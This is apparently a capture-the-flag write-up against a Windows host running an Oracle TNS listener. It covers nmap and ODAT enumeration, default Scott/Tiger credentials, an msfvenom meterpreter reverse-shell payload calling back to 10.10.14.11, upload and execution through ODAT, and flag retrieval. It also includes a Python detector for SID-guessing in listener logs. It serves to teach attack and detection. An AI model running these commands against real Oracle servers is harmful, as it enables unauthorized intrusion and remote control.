Enumeration
Defining a helper variable containing the IP and doing some basic enumeration:
export ip=10.10.10.82
ping $ip # TTL 127: one hop below the Windows default of 128, so probably Windows
nmap -p- $ip # open: 80,135,139,445,1521,5985,47001
nmap -p 80,135,139,445,1521,5985,47001 -sC -sV $ip # default scripts + version detection on the open ports
Ports:
Port | Version | Notes |
---|---|---|
80 | iis 8.5 | trace |
135 | msrpc | |
139 | netbios-ssn | |
445 | microsoft-ds | Windows Server 2008 R2 - 2012 |
1521 | oracle-tns | TNS listener |
49152-49155 | msrpc | |
49159 | oracle-tns | |
49160-49161 | msrpc | |
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE:
Oracle TNS Enumeration
Enumerate the exposed TNS listener (SIDs, service names, default accounts) with the ODAT tool:
sudo odat all -s $ip
# SID: XE
# Service Name: XE,EXEDB
# Credentials: Scott/Tiger found
nmap --script oracle-tns-version -p 1521 -T4 -sV $ip
# 11.2.0.2.0
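The `odat all` sweep above works by asking the listener for many candidate SIDs and service names in a short burst; each miss is written to the listener's log. The following is an added detection example, not part of the original writeup, that flags that pattern in listener.log. The log layout (one `establish` record per connection with the TNS status code as the last field) and the sample lines are constructed and assumed; adjust the field split if your listener version logs differently.

```python
"""Flag SID/service-name guessing against an Oracle TNS listener from listener.log."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample listener.log lines in the (assumed) Oracle 11g layout:
#   <timestamp> * <CONNECT_DATA> * <ADDRESS> * establish * <requested SID/service> * <TNS status>
# Status 0 means the listener accepted the request; 12505 is "unknown SID" and
# 12514 is "unknown service name", the errors an enumeration sweep produces.
SAMPLE_LOG = """\
27-JUL-2018 10:15:01 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=50122)) * establish * XE * 0
27-JUL-2018 10:15:02 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.11)(PORT=40001)) * establish * ORCL * 12505
27-JUL-2018 10:15:02 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.11)(PORT=40002)) * establish * PROD * 12505
27-JUL-2018 10:15:03 * (CONNECT_DATA=(SERVICE_NAME=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.11)(PORT=40003)) * establish * TEST * 12514
27-JUL-2018 10:15:03 * (CONNECT_DATA=(SID=DEV)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.11)(PORT=40004)) * establish * DEV * 12505
27-JUL-2018 10:15:04 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.11)(PORT=40005)) * establish * XE * 0
27-JUL-2018 10:20:00 * (CONNECT_DATA=(SID=XEE)(CID=(PROGRAM=sqlplus)(HOST=app02)(USER=ops))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.51)(PORT=50200)) * establish * XEE * 12505
"""

HOST_RE = re.compile(r"\(HOST=([^)]+)\)")


def parse_line(line):
    """Return (timestamp, source_host, requested_name, status), or None for non-establish lines."""
    fields = line.strip().split(" * ")
    if len(fields) != 6 or fields[3] != "establish":
        return None
    ts = datetime.strptime(fields[0], "%d-%b-%Y %H:%M:%S")
    m = HOST_RE.search(fields[2])  # the ADDRESS part carries the client's IP
    host = m.group(1) if m else "unknown"
    return ts, host, fields[4], int(fields[5])


def find_sid_guessing(log_text, window=timedelta(seconds=60), threshold=3):
    """One alert per source host that requested at least `threshold` distinct
    unknown SIDs/service names inside any span of length `window`."""
    failures = defaultdict(list)  # host -> [(ts, requested_name)] for status != 0
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[3] != 0:
            failures[rec[1]].append((rec[0], rec[2]))

    alerts = []
    for host, events in failures.items():
        events.sort()
        best, first_seen, start = set(), None, 0
        for end in range(len(events)):  # sliding window over this host's failures
            while events[end][0] - events[start][0] > window:
                start += 1
            names = {name for _, name in events[start:end + 1]}
            if len(names) > len(best):
                best, first_seen = names, events[start][0]
        if len(best) >= threshold:
            alerts.append({"host": host, "guesses": sorted(best),
                           "first_seen": first_seen.isoformat()})
    return alerts


if __name__ == "__main__":
    for a in find_sid_guessing(SAMPLE_LOG):
        print(f"possible TNS SID/service enumeration from {a['host']}: "
              f"{a['guesses']} starting {a['first_seen']}")
```

A single typo'd SID from an application host (the 10.10.10.51 line) stays below the threshold, while the burst of distinct misses from one source is reported; the later successful `XE` connection from the same host is the follow-up you would want to correlate with, which is why the alert carries the source IP rather than just the count.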
Oracle TNS File Upload, RCE to Reverse Shell
Create a payload with msfvenom, upload it to the Oracle host with ODAT's utlfile module, then use ODAT's externaltable module to execute it so that it connects back to a Metasploit listener.
# make payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.11 lport=4444 -f exe > access.exe
# upload
odat utlfile -s $ip -U scott -P tiger -d XE --sysdba --putFile c:/ access.exe /tmp/access.exe
# reverse listener
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
run
# RCE the payload
odat externaltable -s $ip -U scott -P tiger -d XE --sysdba --exec c:/ access.exe
Flags
getuid
# NT AUTHORITY (the Oracle service account)
cat c:/users/Phineas/Desktop/user.txt
cat c:/users/Administrator/Desktop/root.txt